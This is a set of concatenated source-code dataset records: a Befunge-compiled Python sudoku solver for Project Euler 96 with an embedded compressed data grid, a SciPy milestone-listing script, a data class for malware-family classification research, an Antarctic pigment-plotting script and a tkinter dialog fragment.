\"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\")\ng = base64.b64decode(_g)[1:]\nfor i in range(ord(base64.b64decode(_g)[0])):\n g = zlib.decompress(g, 16+zlib.MAX_WBITS)\ng=list(map(ord, g))\ndef gr(x,y):\n if(x>=0 and y>=0 and x<218 and y<50):\n return g[y*218 + x];\n return 0;\ndef gw(x,y,v):\n if(x>=0 and y>=0 and x<218 and y<50):\n g[y*218 + x]=v;\ndef td(a,b):\n return ((0)if(b==0)else(a//b))\ndef tm(a,b):\n return ((0)if(b==0)else(a%b))\ns=[]\ndef sp():\n global s\n if (len(s) == 0):\n return 0\n return s.pop()\ndef sa(v):\n global s\n s.append(v)\ndef sr():\n global s\n if (len(s) == 0):\n return 0\n return s[-1]\ndef _0():\n sa(0)\n sa(49)\n sa(1)\n return 1\ndef _1():\n return (3)if(sp()!=0)else(2)\ndef _2():\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()+((((gr(9,1)-48)*10)+(gr(10,1)-48))*10)+(gr(11,1)-48))\n\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n return 3\ndef _3():\n sa(sr());\n gw(6,0,sp())\n gw(1,3,80)\n gw((gr(1,3)%9)+9,(gr(1,3)/9)+1,gr((gr(1,3)%9)+((gr(6,0)/5)*9)+128,8+((gr(6,0)%5)*9)))\n sa(80)\n sa(80)\n return 4\ndef _4():\n return (94)if(sp()!=0)else(5)\ndef _5():\n sp();\n\n return (7)if(sr()!=-1)else(6)\ndef _6():\n sp();\n sys.stdout.write(str(sp())+\" \")\n sys.stdout.flush()\n return 95\ndef _7():\n gw(1,1,22)\n gw(6,1,729)\n gw(17,9,(gr(17,9)%16)+48)\n gw(8+gr(1,1),9,0)\n sa(sp()-1)\n\n sa(80)\n sa(80)\n return 8\ndef _8():\n return (93)if(sp()!=0)else(9)\ndef _9():\n gw(2,0,1)\n sp();\n sa(gr(6,1)-1)\n sa(0)\n sa(((gr(6,1)-1)%27)+72)\n sa(((gr(6,1)-1)/27)+1)\n gw(((gr(6,1)-1)%27)+35,((gr(6,1)-1)/27)+1,0)\n return 10\ndef _10():\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n\n return (92)if(sp()!=0)else(11)\ndef _11():\n gw(3,0,0)\n gw(3,2,8)\n gw(2,2,8)\n gw(1,2,2)\n gw(5,2,1)\n sp();\n sa(80)\n sa(gr(17,9)-48)\n gw(4,2,gr(17,9)-48)\n return 12\ndef _12():\n return (28)if(sp()!=0)else(13)\ndef _13():\n sa(sr());\n\n return (91)if(sp()!=0)else(14)\ndef _14():\n gw(1,4,0)\n sp();\n return 15\ndef _15():\n return (16)if(gr(3,0)!=81)else(90)\ndef _16():\n gw(2,4,8)\n gw(3,4,8)\n sa(80)\n return 17\ndef _17():\n return (18)if(gr(9+gr(2,4),1+gr(3,4))!=48)else(80)\ndef _18():\n sa(sr());\n\n return (79)if(sp()!=0)else(19)\ndef _19():\n sp();\n\n return (20)if((gr(1,4))!=0)else(21)\ndef _20():\n gw(1,4,0)\n return 15\ndef _21():\n gw(1,5,0)\n return 22\ndef _22():\n gw(2,5,0)\n gw(3,5,0)\n gw(4,5,0)\n gw(5,5,6561)\n gw(1,6,8)\n gw(2,6,8)\n sa(80)\n return 23\ndef _23():\n sa(gr(9+gr(1,6),1+gr(2,6))-48)\n return 24\ndef _24():\n return (25)if(sp()!=0)else(70)\ndef _25():\n sa(sr());\n\n return (69)if(sp()!=0)else(26)\ndef _26():\n sp();\n\n return (27)if((gr(4,5))!=0)else(55)\ndef _27():\n global t0\n t0=gr(2,0)+1\n gw(2,0,gr(2,0)+1)\n gw(gr(1,1)+gr(2,5),1+gr(3,5),t0)\n gw(1,2,0)\n gw(2,2,gr(2,5))\n gw(3,2,gr(3,5))\n gw(4,2,gr(4,5))\n gw(5,2,gr(2,0))\n return 28\ndef _28():\n gw(gr(2,2)+9,gr(3,2)+1,gr(4,2)+48)\n gw(3,0,gr(3,0)+1)\n gw(1,3,8)\n sa(8)\n return 29\ndef _29():\n gw(35+(gr(2,2)*3)+(gr(1,3)%3),1+(gr(3,2)*3)+(gr(1,3)/3),88)\n\n return (30)if((gr(72+(gr(2,2)*3)+(gr(1,3)%3),1+(gr(3,2)*3)+(gr(1,3)/3)))!=0)else(54)\ndef _30():\n sa(sr());\n return 31\ndef _31():\n return (32)if(sp()!=0)else(33)\ndef _32():\n sa(sp()-1)\n\n sa(sr());\n gw(1,3,sp())\n return 29\ndef _33():\n gw(2,3,8)\n sp();\n sa(8)\n return 34\ndef _34():\n gw(35+(gr(2,3)*3)+((gr(4,2)-1)%3),1+(gr(3,2)*3)+((gr(4,2)-1)/3),88)\n\n return (35)if((gr(72+(gr(2,3)*3)+((gr(4,2)-1)%3),1+(gr(3,2)*3)+((gr(4,2)-1)/3)))!=0)else(53)\ndef _35():\n sa(sr());\n return 36\ndef _36():\n return (37)if(sp()!=0)else(38)\ndef _37():\n sa(sp()-1)\n\n sa(sr());\n gw(2,3,sp())\n return 34\ndef _38():\n gw(3,3,8)\n sp();\n sa(8)\n return 39\ndef _39():\n gw(35+(gr(2,2)*3)+((gr(4,2)-1)%3),1+(gr(3,3)*3)+((gr(4,2)-1)/3),88)\n\n return (40)if((gr(72+(gr(2,2)*3)+((gr(4,2)-1)%3),1+(gr(3,3)*3)+((gr(4,2)-1)/3)))!=0)else(52)\ndef _40():\n sa(sr());\n\n return (51)if(sp()!=0)else(41)\ndef _41():\n gw(2,3,2)\n gw(3,3,2)\n sp();\n sa(8)\n return 42\ndef _42():\n gw(35+((((gr(2,2)/3)*3)+gr(2,3))*3)+((gr(4,2)-1)%3),1+((((gr(3,2)/3)*3)+gr(3,3))*3)+((gr(4,2)-1)/3),88)\n\n return (43)if((gr(72+((((gr(2,2)/3)*3)+gr(2,3))*3)+((gr(4,2)-1)%3),1+((((gr(3,2)/3)*3)+gr(3,3))*3)+((gr(4,2)-1)/3)))!=0)else(50)\ndef _43():\n sa(sr());\n return 44\ndef _44():\n return (49)if(sp()!=0)else(45)\ndef _45():\n sp();\n sa(gr(1,2))\n\n return (46)if((gr(1,2))!=0)else(14)\ndef _46():\n sa(sp()-1)\n\n sa(sr());\n\n return (47)if(sp()!=0)else(48)\ndef _47():\n sp();\n return 13\ndef _48():\n sp();\n return 18\ndef _49():\n sa(sp()-1)\n\n sa(sr());\n gw(2,3,sr()%3)\n sa(sp()/3);\n\n gw(3,3,sp())\n return 42\ndef _50():\n gw(72+((((gr(2,2)/3)*3)+gr(2,3))*3)+((gr(4,2)-1)%3),1+((((gr(3,2)/3)*3)+gr(3,3))*3)+((gr(4,2)-1)/3),gr(5,2))\n sa(sr());\n return 44\ndef _51():\n sa(sp()-1)\n\n sa(sr());\n gw(3,3,sp())\n return 39\ndef _52():\n gw(72+(gr(2,2)*3)+((gr(4,2)-1)%3),1+(gr(3,3)*3)+((gr(4,2)-1)/3),gr(5,2))\n return 40\ndef _53():\n gw(72+(gr(2,3)*3)+((gr(4,2)-1)%3),1+(gr(3,2)*3)+((gr(4,2)-1)/3),gr(5,2))\n sa(sr());\n return 36\ndef _54():\n gw(72+(gr(2,2)*3)+(gr(1,3)%3),1+(gr(3,2)*3)+(gr(1,3)/3),gr(5,2))\n sa(sr());\n return 31\ndef _55():\n gw(1,7,-1)\n gw(2,7,-1)\n gw(3,7,-1)\n gw(5,7,8)\n gw(6,7,8)\n sa(80)\n return 56\ndef _56():\n return (57)if((gr(22+gr(5,7),1+gr(6,7))-gr(2,0))!=0)else(68)\ndef _57():\n sa(sr());\n\n return (67)if(sp()!=0)else(58)\ndef _58():\n gw(5,7,26)\n gw(6,7,26)\n sp();\n sa(728)\n return 59\ndef _59():\n return (66)if((gr(72+gr(5,7),1+gr(6,7))-gr(2,0))!=0)else(60)\ndef _60():\n gw(72+gr(5,7),1+gr(6,7),0)\n gw(35+gr(5,7),1+gr(6,7),0)\n\n return (65)if(gr(9+(gr(5,7)/3),1+(gr(6,7)/3))!=48)else(61)\ndef _61():\n sa(sr());\n return 62\ndef _62():\n return (64)if(sp()!=0)else(63)\ndef _63():\n gw(2,0,gr(2,0)-1)\n gw(22+gr(2,7),1+gr(3,7),0)\n gw(1,5,gr(1,7))\n sp();\n return 22\ndef _64():\n sa(sp()-1)\n\n gw(5,7,sr()%27)\n gw(6,7,sr()/27)\n return 59\ndef _65():\n gw(9+(gr(5,7)/3),1+(gr(6,7)/3),48)\n gw(3,0,gr(3,0)-1)\n sa(sr());\n return 62\ndef _66():\n sa(sr());\n return 62\ndef _67():\n sa(sp()-1)\n\n gw(5,7,sr()%9)\n gw(6,7,sr()/9)\n return 56\ndef _68():\n gw(1,7,gr(9+gr(5,7),1+gr(6,7))-48)\n gw(2,7,gr(5,7))\n gw(3,7,gr(6,7))\n return 57\ndef _69():\n sa(sp()-1)\n\n gw(1,6,sr()%9)\n gw(2,6,sr()/9)\n return 23\ndef _70():\n gw(4,6,0)\n gw(5,6,0)\n gw(6,6,1)\n sa(1)\n return 71\ndef _71():\n return (74)if((gr(35+(gr(1,6)*3)+((gr(6,6)-1)%3),1+(gr(2,6)*3)+((gr(6,6)-1)/3)))!=0)else(72)\ndef _72():\n gw(5,6,gr(5,6)+1)\n\n return (74)if((((1)if((gr(4,6))!=0)else(0))+((1)if(gr(6,6)<=gr(1,5))else(0)))!=0)else(73)\ndef _73():\n gw(4,6,gr(6,6))\n return 74\ndef _74():\n return (78)if(sr()!=9)else(75)\ndef _75():\n sp();\n\n return (76)if((((0)if((gr(5,6))!=0)else(1))+((1)if(gr(5,5)<=gr(5,6))else(0)))!=0)else(77)\ndef _76():\n sa(1)\n return 24\ndef _77():\n gw(2,5,gr(1,6))\n gw(3,5,gr(2,6))\n gw(4,5,gr(4,6))\n gw(5,5,gr(5,6))\n return 76\ndef _78():\n sa(sp()+1)\n\n sa(sr());\n gw(6,6,sp())\n return 71\ndef _79():\n sa(sp()-1)\n\n gw(2,4,sr()%9)\n gw(3,4,sr()/9)\n return 17\ndef _80():\n gw(5,4,0)\n gw(6,4,0)\n gw(4,4,8)\n sa(8)\n return 81\ndef _81():\n return (82)if((gr(35+(gr(2,4)*3)+(gr(4,4)%3),1+(gr(3,4)*3)+(gr(4,4)/3)))!=0)else(89)\ndef _82():\n sa(sr());\n return 83\ndef _83():\n return (88)if(sp()!=0)else(84)\ndef _84():\n global t0\n t0=gr(6,4)\n sp();\n\n return (85)if((gr(6,4))!=0)else(87)\ndef _85():\n global t0\n t0=t0-1\n\n return (18)if((t0)!=0)else(86)\ndef _86():\n gw(1,4,gr(1,4)+1)\n gw(1,2,1)\n gw(2,2,gr(2,4))\n gw(3,2,gr(3,4))\n gw(4,2,gr(5,4))\n gw(5,2,gr(2,0))\n return 28\ndef _87():\n sp();\n return 55\ndef _88():\n sa(sp()-1)\n\n sa(sr());\n gw(4,4,sp())\n return 81\ndef _89():\n gw(6,4,gr(6,4)+1)\n gw(5,4,gr(4,4)+1)\n sa(sr());\n return 83\ndef _90():\n sa((0)if(sr()-49!=0)else(1))\n return 1\ndef _91():\n sa(sp()-1)\n\n gw(3,2,sr()/9)\n gw(2,2,sr()%9)\n gw(1,2,2)\n gw(5,2,1)\n sa(sr());\n sa((sr()%9)+9)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n sa(gr(sp(),v0))\n sa(sp()-48)\n\n sa(sr());\n gw(4,2,sp())\n return 12\ndef _92():\n sa(sp()-1)\n\n sa(sr());\n sa(0)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%27)+35)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/27);\n\n sa(sp()+1)\n\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n sa(0)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%27)+72)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/27);\n\n sa(sp()+1)\n return 10\ndef _93():\n sa(sp()-1)\n\n sa(sr());\n sa(sr());\n sa((sr()%9)+9)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n sa(gr(sp(),v0))\n sa(sp()%16);\n\n sa(sp()+48)\n\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%9)+9)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n sa(0)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%9)+gr(1,1))\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n return 8\ndef _94():\n global t0\n sa(sp()-1)\n\n sa(sr());\n sa(sr());\n gw(1,3,sp())\n sa(sp()/9);\n\n sa(sp()+((gr(6,0)%5)*9))\n\n sa((gr(1,3)%9)+((gr(6,0)/5)*9)+128)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n v0=sp()\n t0=gr(sp(),v0)\n gw((gr(1,3)%9)+9,(gr(1,3)/9)+1,t0)\n sa(sr());\n return 4\nm=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21,_22,_23,_24,_25,_26,_27,_28,_29,_30,_31,_32,_33,_34,_35,_36,_37,_38,_39,_40,_41,_42,_43,_44,_45,_46,_47,_48,_49,_50,_51,_52,_53,_54,_55,_56,_57,_58,_59,_60,_61,_62,_63,_64,_65,_66,_67,_68,_69,_70,_71,_72,_73,_74,_75,_76,_77,_78,_79,_80,_81,_82,_83,_84,_85,_86,_87,_88,_89,_90,_91,_92,_93,_94]\nc=0\nwhile c<95:\n c=m[c]()\n","sub_path":"compiled/Python2/Euler_Problem-096.py","file_name":"Euler_Problem-096.py","file_ext":"py","file_size_in_byte":14781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"553532188","text":"def main():\n p = argparse.ArgumentParser(usage=__doc__.lstrip())\n p.add_argument('--project', default='scipy/scipy')\n p.add_argument('milestone')\n args = p.parse_args()\n getter = CachedGet('gh_cache.json')\n try:\n milestones = get_milestones(getter, args.project)\n if (args.milestone not in milestones):\n msg = 'Milestone {0} not available. Available milestones: {1}'\n msg = msg.format(args.milestone, ', '.join(sorted(milestones)))\n p.error(msg)\n issues = get_issues(getter, args.project, args.milestone)\n issues.sort()\n finally:\n getter.save()\n prs = [x for x in issues if ('/pull/' in x.url)]\n issues = [x for x in issues if (x not in prs)]\n\n def print_list(title, items):\n print()\n print(title)\n print(('-' * len(title)))\n print()\n for issue in items:\n msg = '- `#{0} <{1}>`__: {2}'\n title = re.sub('\\\\s+', ' ', issue.title.strip())\n if (len(title) > 60):\n remainder = re.sub('\\\\s.*$', '...', title[60:])\n if (len(remainder) > 20):\n remainder = (title[:80] + '...')\n else:\n title = (title[:60] + remainder)\n msg = msg.format(issue.id, issue.url, title)\n print(msg)\n print()\n msg = 'Issues closed for {0}'.format(args.milestone)\n print_list(msg, issues)\n msg = 'Pull requests for {0}'.format(args.milestone)\n print_list(msg, prs)\n return 0","sub_path":"Data Set/bug-fixing-5/398f9a750a163d54267a3574a5a2e99db567b506-
-bug.py","file_name":"398f9a750a163d54267a3574a5a2e99db567b506-
-bug.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419981932","text":"# マルウェアファミリのクラス\r\nclass family:\r\n def __init__(self):\r\n self.name = '' # ファミリ名\r\n self.samples = [] # 検体のリスト\r\n self.num = 0 # 検体数\r\n self.par_vec = [] # Paragraph Vectorのリスト\r\n self.sampling_count = 0 # サンプリングできる回数\r\n self.svm_data = [] # SVMに追加するデータリスト\r\n self.svm_label = [] # SVMに追加するデータリストの教師ラベル\r\n\r\n","sub_path":"MalwareVariantsClassification_YukiNakashima/program/Family.py","file_name":"Family.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"167203974","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jul 21 12:54:48 2019\r\n积分色素浓度画图 散点和分布图两种\r\n@author: Administrator\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\nsys.path.append('D:/Refresh/py36')\r\nimport support_pie\r\nfrom matplotlib.colors import LogNorm\r\nimport matplotlib as mpl \r\n\r\ndef del_nan(value):\r\n arg_nan = np.where(np.isnan(value))\r\n arg = list(np.arange(len(value)))\r\n for i in range(len(arg_nan[0])):\r\n i = i+1\r\n x = arg_nan[0][-i]\r\n del arg[x]\r\n value = value[arg]\r\n return value,arg\r\n\r\n\r\ndef plot(pigment,df_plt,image):\r\n lon = np.array(df_plt.loc[:,'Longitude [degrees_east]'])\r\n lat = np.array(df_plt.loc[:,'Latitude [degrees_north]'])\r\n value = np.array(df_plt.loc[:,pigment])\r\n lon,lat,value = support_pie.inter_data(lon,lat,value,1000)\r\n# norm = LogNorm(vmin=np.min(value),\r\n# vmax=np.max(value)) \r\n norm = mpl.colors.Normalize(vmin=value.min(),\r\n vmax=value.max()*0.8)\r\n B = plt.contourf(lon,lat,value,25,cmap='rainbow',\r\n norm=norm,alpha=1)\r\n #colorbar \r\n plt.colorbar(B,format='%.1f') \r\n C = plt.contour(lon,lat,value,5,colors='white',linewidths=0.5,\r\n norm=norm)\r\n plt.clabel(C,inline=True,fontsize=12,colors='black',fmt='%.1f')\r\n #岛屿\r\n support_pie.contourf_re(image,lon_left,lon_right,lat_bottom,lat_top)\r\n\r\n \r\ndef plot_scatter(pigment,df_plt,image):\r\n# fig = plt.figure()\r\n support_pie.contourf(image,lon_left,lon_right,lat_bottom,lat_top)\r\n\r\n #station_index = np.array(df_plt['Station'])\r\n station_lon = np.array(df_plt.loc[:,'Longitude [degrees_east]'])\r\n station_lat = np.array(df_plt.loc[:,'Latitude [degrees_north]'])\r\n colors = np.array(df_plt.loc[:,pigment])/5\r\n\r\n norm = LogNorm(vmin=np.min(colors),\r\n vmax=np.max(colors))\r\n plt.scatter(station_lon,station_lat,\r\n c = colors,cmap='rainbow',s = 60,norm=norm) \r\n\r\n cb = plt.colorbar(format='%.1f')\r\n cb_ticks = cb.get_ticks()\r\n cb.set_ticks(cb_ticks[::2])\r\n#读取数据\r\ndf = pd.read_excel('D:/Refresh/data/CHINARE-35/水柱积分藻种数据.xlsx',\r\n sheet_name='Sheet1').set_index('Station')\r\n\r\n\r\nfontsize={'size':14,'weight':'normal'} \r\n\r\nlon_left,lon_right,lat_bottom,lat_top = -108,-88,-73,-65\r\nz = ['Chlorophyll A','Pheophorbide A','Pheophytin A','Fucoxanthin','19-hex',\r\n 'Alloxanthin','Peridinin','Chlorophyll B'] #色素列名\r\ntext = ['Chlorophyll a/mg·$\\mathregular{m^{-2}}$',\r\n 'Pheophorbide a/mg·$\\mathregular{m^{-2}}$',\r\n 'Pheophytin a/mg·$\\mathregular{m^{-2}}$',\r\n 'Fucoxanthin/mg·$\\mathregular{m^{-2}}$',\r\n \"19'-hexanoyloxyfucoxanthin/mg·$\\mathregular{m^{-2}}$\",\r\n 'Alloxanthin/mg·$\\mathregular{m^{-2}}$',\r\n 'Peridinin/mg·$\\mathregular{m^{-2}}$',\r\n 'Chlorophyll b/mg·$\\mathregular{m^{-2}}$'] #题名\r\nindex,column = [4,2] #行和列的数量 【2*2 也可,z和title列数量(4)对应就好】\r\nfig_dir = 'D:/Refresh/data/CHINARE-35/pic/特征色素积分分布-english.png' #图片保存路径\r\n\r\nplt.rcParams['font.sans-serif']=['Times New Roman'] \r\nfig = plt.figure()\r\nplt.rcParams['figure.figsize'] = (10,10)\r\nplt.subplots_adjust(wspace=0.01,hspace=0.1)\r\n\r\nimage = support_pie.loadtif()\r\nnum = 0\r\nfor i in range(index):\r\n for j in range(column):\r\n plt.subplot(index,column,num+1)\r\n plt.gca().xaxis.set_ticks_position('top') \r\n plot(z[num],df,image)\r\n plt.text(-90,-66,support_pie.getChar(num),fontdict=fontsize)\r\n plt.text(-107.7,-66.5,s=text[num],fontdict=fontsize)\r\n\r\n# plt.text(char_x,char_y,support_pie.getChar(num),\r\n# fontdict=fontsize)\r\n if i != 0 :\r\n plt.xticks(())\r\n if j != 0:\r\n plt.yticks(())\r\n num += 1\r\n \r\nplt.savefig(fig_dir,bbox_inches='tight',dpi=1000,pad_inches=0.1)\r\nplt.show()\r\n\r\n###积分chla 分布\r\n#plt.rcParams['figure.figsize'] = (11,6)\r\n#plot('tchla',df,image)\r\n#plt.text(x,y,s='Chlorophyll a/μg·$\\mathregular{m^{-2}}$',\r\n# fontdict=fontsize)\r\n#plt.gca().xaxis.set_ticks_position('top')\r\n#plt.text(-46,-59.5,'f',fontdict=fontsize)\r\n#plt.savefig('D:/Refresh/data/CHINARE-32/pic/CHEMTAX藻种分布/chla积分分布.png',\r\n# bbox_inches='tight',dpi=1000,pad_inches=0.1)","sub_path":"CHINARE-35阿蒙森海东侧海域/图4-3 叶绿素a及其降解产物及特征色素积分浓度分布图.py","file_name":"图4-3 叶绿素a及其降解产物及特征色素积分浓度分布图.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5822910","text":"#!/usr/bin/python3\n#-----------------------------------------------------------------------------\n# project: tkinterlite\n# authors: 1966bc\n# mailto: [giuseppe.costanzi@gmail.com]\n# modify: 10/04/2017\n# version: 0.1 \n#-----------------------------------------------------------------------------\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nclass Dialog(Toplevel): \n def __init__(self,parent,engine,index=None):\n super().__init__(name='category')\n \n self.resizable(0,0)\n self.parent = parent\n self.engine = engine\n self.index = index\n \n self.enable = BooleanVar()\n\n self.center_me()\n self.init_ui()\n\n def center_me(self):\n\n #center window\n x = (self.master.winfo_screenwidth() - self.master.winfo_reqwidth()) / 2\n y = (self.master.winfo_screenheight() - self.master.winfo_reqheight()) / 2\n self.master.geometry(\"+%d+%d\" % (x, y))\n \n def init_ui(self):\n\n self.panel = self.engine.get_panel_frame(self)\n self.panel.grid(row = 0, column = 0, sticky=N+W+S+E)\n\n Label(self.panel, text=\"Category:\",anchor='w').grid(row=0, sticky='w')\n self.txtCategory = Entry(self.panel,)\n self.txtCategory.grid(row=0, column=1, sticky='w')\n\n 